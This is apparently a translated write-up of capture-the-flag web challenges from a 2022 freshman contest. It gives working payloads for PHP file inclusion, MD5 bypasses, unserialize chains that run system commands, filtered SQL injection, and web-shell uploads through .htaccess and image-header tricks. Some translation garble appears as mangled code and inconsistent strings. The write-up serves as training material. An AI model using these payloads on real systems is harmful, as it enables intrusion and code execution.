Table of Contents
ez_ez_php
ez_ez_php(revenge)
Wonderful MD5
1z_unserialize
numgame
where_am_i
ez_ez_unserialize
js_sign
xff
webdog1__start
ez_sql
funny_php
funny_web
ez_1zpop
Ez_upload
file_master
Power!
ez_ez_php
source code:
<?php error_reporting(0); if (isset($_GET['file'])) { if ( substr($_GET["file"], 0, 3) === "php" ) { echo "Nice!!!"; include($_GET["file"]); } else { echo "Hacker!!"; } }else { highlight_file(__FILE__); } //flag.php
The file contains and also limits the first 3 characters to php
Direct php pseudo-protocol
?file=php://filter/convert.base64-encode/resource=flag.php
payload:
?file=php://filter/read=convert.base64-encode/resource=flag
base64 decoding
ez_ez_php(revenge)
source code:
<?php error_reporting(0); if (isset($_GET['file'])) { if ( substr($_GET["file"], 0, 3) === "php" ) { echo "Nice!!!"; include($_GET["file"]); } else { echo "Hacker!!"; } }else { highlight_file(__FILE__); } //flag.php
payload:
?file=php://filter/convert.base64-encode/resource=/flag
base64 decoding
Wonderful MD5
ffifdyop
After md5 encryption: 276f722736c95d99e921722cf9ed621c
Then convert it into a string: ‘or’6'or'66?]!r,b
use:
select * from admin where password=”or’6
It is equivalent to select * from admin where password=”or 1 to implement sql injection
Check out the source code
md5 bypass
payload:
?x=240610708 & amp;y=QLTNHNDT
Visit f1na11y.php
Direct array bypass
wqh[]=1 & amp;dsy[]=2
1z_unserialize
source code:
<?php class lyh{ public $url = 'NSSCTF.com'; public $lt; public $lly; function __destruct() { $a = $this->lt; $a($this->lly); } } unserialize($_POST['nss']); highlight_file(__FILE__); ?>
This is the answer to this question
As long as the injection point is passed, $a becomes system(); $this->lly becomes ls or cat, and it is a simple command injection
payload:
<?php class lyh{ public $url = 'NSSCTF.com'; public $lt; public $lly; } $a = new lyh(); $a->lt='system'; $a->lly='ls /'; echo serialize($a); ?>
nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt"; s:6:"system";s:3:"lly";s:4:"ls /";}
The next step is just cat flag.
nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt"; s:6:"system";s:3:"lly";s:9:"cat /flag";}
numgame
Open developer tools in settings
Just go into settings and disable js
flag in js file
base64 decoding
Our The purpose is to pass the parameter p through get and then call the ctf static method in nss with the help of call_user_func.
if (preg_match(“/n|c/m”,$_GET[‘p’], $matches))
Just disable n and c, and then use /m in multi-text form,
call_user_func($_GET[‘p’]); Call the function passed in by p
Here is a knowledge point
You can call the static method of CTF in the class through NSS::CTF. The class name and method name here are not case-sensitive.
So we can capitalize and bypass
And because hint2.php
So payload :
?p=Nss2::Ctf
where_am_i
guess phone number
Just search for pictures
02886112888
ez_ez_unserialize
source code:
<?php class { public $x = __FILE__; function __construct($x) { $this->x = $x; } function __wakeup() { if ($this->x !== __FILE__) { $this->x = __FILE__; } } function __destruct() { highlight_file($this->x); //flag is in fllllllag.php } } if (isset($_REQUEST['x'])) { @unserialize($_REQUEST['x']); } else { highlight_file(__FILE__); }
payload:
<?php class { public $x = 'fllllllag.php'; } $a=new X; echo serialize($a); ?>
O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}
Also bypass the __wakeup function
So change it to:
?x=O:1:"X":2:{s:1:"x";s:13:"fllllllag.php";}
js_sign
Look at the source code
There is js
This should be the key to solving the problem
A tool is used here
CTF online tool – online tap code | tap code encoding | tap code algorithm | tap code (hiencode.com)
Decode with spaces
3343431344215434452124331421311122125444113513341415
This will appear
flag
NSSCTF{youfindflagbytapcode}
xff
webdog1__start
The general md5 bypass is to pass in the md5 value starting with 0e, because in weak comparison, the number of a string will be intercepted in the weak comparison. Until the character cutoff is encountered, for the value of 0e + number, only the 0 before e will be intercepted. , so even if the incoming md5 value is equal to $md5, it still needs to be equal to its own md5 value. We can choose 0e or a number that still starts with 0e after encryption. For example: 0e215962017, and these pure strings are converted to 0e + number of digits: QNKCDZO, s878926199a
?web=0e215962017
View source code
The bot is usually robots.txt. When you answer questions in the future, you may occasionally encounter situations where robots.txt is leaked and you will get a prompt.
It will be garbled at first, just fix it (if it is Firefox, you can find it in the customized toolbar)
It’s quite hidden
here strstr Filtered by spaces
str_ireplace replaces flag with spaces
payload:
?get=system(ls);
Equivalent to (tab)
?get=system("cat /f*");
ez_sql
A relatively safe method to pass parameters. This should refer to POST passing parameters.
Try to pass a
Things shouldn’t be that simple
Know by trying that spaces and or are filtered
You can use /**/ to replace spaces or you can use double writing
nss=1'/**/oorrder/**/by/**/4#
We can know that the database has 3 columns
Explode the database (the union method is the same as above)
nss=1'/**/ununionion/**/select/**/1,updatexml(1,concat(0x7e,(select/**/database()),0x7e),1)#< /pre> <p><img alt="" height="1200" src="//i2.wp.com/img-blog.csdnimg.cn/c6ebff44651c4a05947345602d305776.png" width="1200"></p> <p>Explosion data table (or of information also needs to be filtered)</p> <pre>nss=1'/**/ununionion/**/select/**/1,updatexml(1,concat(0x7e,(select/**/group_concat(table_name)/**/from/** /infoorrmation_schema.tables/**/where/**/table_schema='NSS_db'),0x7e),1) #
Exploding columns in NSS_tb
nss=1'/**/ununionion/**/select/**/1,updatexml(1,concat(0x7e,(select/**/group_concat(column_name)/**/from/** /infoorrmation_schema.columns/**/where/**/table_name='NSS_tb'),0x7e),1) #
blast flag
nss=1'/**/ununionion/**/select/**/1,updatexml(1,concat(0x7e,(select/**/group_concat(flll444g)/**/from/** /NSS_tb),0x7e),1) #
It’s fake at first glance
BlastingSecr3t
nss=0'/**/ununionion/**/select/**/1,(select/**/group_concat(Secr3t)/**/from/**/NSS_tb),3#</ pre> <p><img alt="" height="1200" src="//i2.wp.com/img-blog.csdnimg.cn/8f88017e1b0e499eafc87bfa0d03f1e6.png" width="1200"></p> <h2 id="funny_php">funny_php</h2> <p>source code:</p> <pre><?php session_start(); highlight_file(__FILE__); if(isset($_GET['num'])){ if(strlen($_GET['num'])<=3 & amp; & amp;$_GET['num']>999999999){ echo ":D"; $_SESSION['L1'] = 1; }else{ echo ":C"; } } if(isset($_GET['str'])){ $str = preg_replace('/NSSCTF/',"",$_GET['str']); if($str === "NSSCTF"){ echo "wow"; $_SESSION['L2'] = 1; }else{ echo $str; } } if(isset($_POST['md5_1']) & amp; & amp;isset($_POST['md5_2'])){ if($_POST['md5_1']!==$_POST['md5_2'] & amp; & amp;md5($_POST['md5_1'])==md5($_POST[' md5_2'])){ echo "Nice!"; if(isset($_POST['md5_1']) & amp; & amp;isset($_POST['md5_2'])){ if(is_string($_POST['md5_1']) & amp; & amp;is_string($_POST['md5_2'])){ echo "yoxi!"; $_SESSION['L3'] = 1; }else{ echo "X("; } } }else{ echo "G"; echo $_POST['md5_1']."\\ ".$_POST['md5_2']; } } if(isset($_SESSION['L1']) & amp; & amp;isset($_SESSION['L2']) & amp; & amp;isset($_SESSION['L3']) ){ include('flag.php'); echo $flag; } ?>
Let’s explain step by step
first step
if(isset($_GET['num'])){ if(strlen($_GET['num'])<=3 & amp; & amp;$_GET['num']>999999999){ echo ":D"; $_SESSION['L1'] = 1; }else{ echo ":C"; } }
It is required that the length of num is less than or equal to 3, but greater than 999999999. It is easy to think of 1e9 passing parameters.
So payload:
?num=1e9
Step 2
if(isset($_GET['str'])){ $str = preg_replace('/NSSCTF/',"",$_GET['str']); if($str === "NSSCTF"){ echo "wow"; $_SESSION['L2'] = 1; }else{ echo $str; } }
This will replace the NSSCTF in the string you passed in with empty, then we only need to use double writing to bypass it.
?str=NSSNSSCTFCTF
third step
if(isset($_POST['md5_1']) & amp; & amp;isset($_POST['md5_2'])){ if($_POST['md5_1']!==$_POST['md5_2'] & amp; & amp;md5($_POST['md5_1'])==md5($_POST[' md5_2'])){ echo "Nice!"; if(isset($_POST['md5_1']) & amp; & amp;isset($_POST['md5_2'])){ if(is_string($_POST['md5_1']) & amp; & amp;is_string($_POST['md5_2'])){ echo "yoxi!"; $_SESSION['L3'] = 1; }else{ echo "X("; } } }else{ echo "G"; echo $_POST['md5_1']."\\ ".$_POST['md5_2']; } }
Here you can directly bypass the md5 weak type
md5_1=240610708 & amp;md5_2=QLTHNDT
So payload:
GET ?num=1e9 &str=NSSNSSCTFCTF POST md5_1=240610708 &md5_2=QLTNHNDT
funny_web
Account: NSS
Password: 2122693401
payload:
?num=12345a
ez_1zpop
source code:
<?php error_reporting(0); classdxg { function fmm() { return "nonono"; } } classlt { public $impo='hi'; public $md51='weclome'; public $md52='to NSS'; function__construct() { $this->impo = new dxg; } function __wakeup() { $this->impo = new dxg; return $this->impo->fmm(); } function __toString() { if (isset($this->impo) & amp; & amp; md5($this->md51) == md5($this->md52) & amp; & amp; $this->md51 != $this- >md52) return $this->impo->fmm(); } function __destruct() { echo $this; } } class fin { public $a; public $url = 'https://www.ctfer.vip'; public $title; function fmm() { $b = $this->a; $b($this->title); } } if (isset($_GET['NSS'])) { $Data = unserialize($_GET['NSS']); } else { highlight_file(__file__); }
fin object
The fmm method assigns a value to?, when the function is called, if b=’system’ is assigned, when the function is called, if b=’system’
title and then pass in the command we want
Finally, you can get the example, system(ls’) => ?=′′;a=′system′;title=target command’
lt object
Deserialization triggers __wakeup, __destruct, and in the __wakeup method, give the impo instance a dxg object and return it directly. Effective information cannot be obtained. The method to bypass __wakeup is very simple. You only need to convert the deserialized string into Increase the number of object attributes, for example, O:3:”fin”:3:{s:1:”a”;N;s:3:”url”;N;s:5:”title”;N;} => O:3:”fin”:4:{s:1:”a”;N;s:3:”url”;N;s:5:”title”;N;}
It is very simple to trigger the __destruct method. It outputs itself as a string, directly triggers the __toString method, and returns the fmm method.
payload:
<?php classlt { public $impo; public $md51='240610708'; public $md52='QLTNHNDT'; } class fin { public $a='system'; public $ur='111' ; public $title='ls /'; } $aa=new lt(); $aa->impo=new fin(); echo serialize($aa); ?>
Modify the number of lt attributes here to bypass __wakeup
?NSS=O:2:"lt":4:{s:4:"impo";O:3:"fin":3:{s:1:"a\ ";s:6:"system";s:2:"ur";s:3:"111";s:5:"title";s:4:"ls / ";}s:4:"md51";s:9:"240610708";s:4:"md52";s:7:"QLTHNDT";}
take flag
payload:
<?php classlt { public $impo; public $md51='240610708'; public $md52='QLTNHNDT'; } class fin { public $a='system'; public $ur='111' ; public $title='cat /flag'; } $aa=new lt(); $aa->impo=new fin(); echo serialize($aa); ?>
?NSS=O:2:"lt":4:{s:4:"impo";O:3:"fin":3:{s:1:"a\ ";s:6:"system";s:2:"ur";s:3:"111";s:5:"title";s:9:"cat / flag";}s:4:"md51";s:9:"240610708";s:4:"md52";s:7:"QLTHNDT";}
Ez_upload
File Upload
Upload .htaccess file
<FilesMatch "mochu"> SetHandler application/x-httpd-php </FilesMatch>
Modify Content-Type
Upload shell.mochu
<script language="php">@eval($_POST['1']);</script>
Just access shell.mochu
file_master
First write a.php
write
GIF89a <?=eval($_POST['1']);?>
upload
Modify Content-Type
Found that height and width have limitations
Modify GIF89a to #define height 1 #define width 1
Ant Sword is connected but I can’t access the flag. I don’t know why.
I’ll look at what other masters wrote later.
#define height 1 #define width 1 <?=`nl /f*`;?>
Power!
Take a look at the source code
Blind guess get transfer source
Source code :
<?php class FileViewer{ public $black_list = "flag"; public $local = "http://127.0.0.1/"; public $path; public function __call($f,$a){ $this->loadfile(); } public function loadfile(){ if(!is_array($this->path)){ if(preg_match("/".$this->black_list."/i",$this->path)){ $file = $this->curl($this->local."cheems.jpg"); }else{ $file = $this->curl($this->local.$this->path); } }else{ $file = $this->curl($this->local."cheems.jpg"); } echo '<img src="data:jpg;base64,'.base64_encode($file).'"/>'; } public function curl($path){ $url = $path; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_HEADER, 0); $response = curl_exec($curl); curl_close($curl); return $response; } public function __wakeup(){ $this->local = "http://127.0.0.1/"; } } class Backdoor{ public $a; public $b; public $superhacker = "hacker.jpg"; public function goodman($i,$j){ $i->$j = $this->superhacker; } public function __destruct(){ $this->goodman($this->a,$this->b); $this->a->c(); } } if(isset($_GET['source'])){ highlight_file(__FILE__); }else{ if(isset($_GET['image_path'])){ $path = $_GET['image_path']; //flag in /flag.php if(is_string($path) & amp; & amp;!preg_match("/http:|gopher:|glob:|php:/i",$path)){ echo '<img src="data:jpg;base64,'.base64_encode(file_get_contents($path)).'"/>'; }else{ echo '<h2>Seriously</h2><img src="data:jpg;base64,'.base64_encode(file_get_contents("cheems.jpg")).'"/>' ; } }else if(isset($_GET['path_info'])){ $path_info = $_GET['path_info']; $FV = unserialize(base64_decode($path_info)); $FV->loadfile(); }else{ $path = "vergil.jpg"; echo '<h2>POWER!!</h2> <img src="data:jpg;base64,'.base64_encode(file_get_contents($path)).'"/>'; } } ?>
Didn’t quite understand
Check out the boss’s wp here
NSS[SWPUTF 2022 Freshman Competition]ez_sql + funny_php + js_sign + funny_web + Power! – bilibili (bilibili.com)
<?php class FileViewer{ public $black_list ="The blacklist has nothing to do with me"; public $local; public $path="flag.php"; } class Backdoor{ public $a; public $b; public $superhacker ="127.0.0.1:65500/"; } $m = new FileViewer; $n = new Backdoor; $n->a=$m; $n->b="local"; $m->local=$n; echo (base64_encode(serialize($m))); ?>
payload:
?path_info=TzoxMDoiRmlsZVZpZXdlciI6Mzp7czoxMDoiYmxhY2tfbGlzdCI7czozMDoi6buR5ZCN5Y2V5LuA5LmI55qE566h5LiN552A5oiRIjtzOjU6ImxvY2FsIjtPOjg6IkJhY2tkb29y IjozOntzOjE6ImEiO3I6MTtzOjE6ImIiO3M6NToibG9jYWwiO3M6MTE6InN1cGVyaGFja2VyIjtzOjE2OiIxMjcuMC4wLjE6NjU1MDAvIjt9czo0OiJwYXRoIjtzOjg6ImZsYWcucGhwIjt9
base64 decoding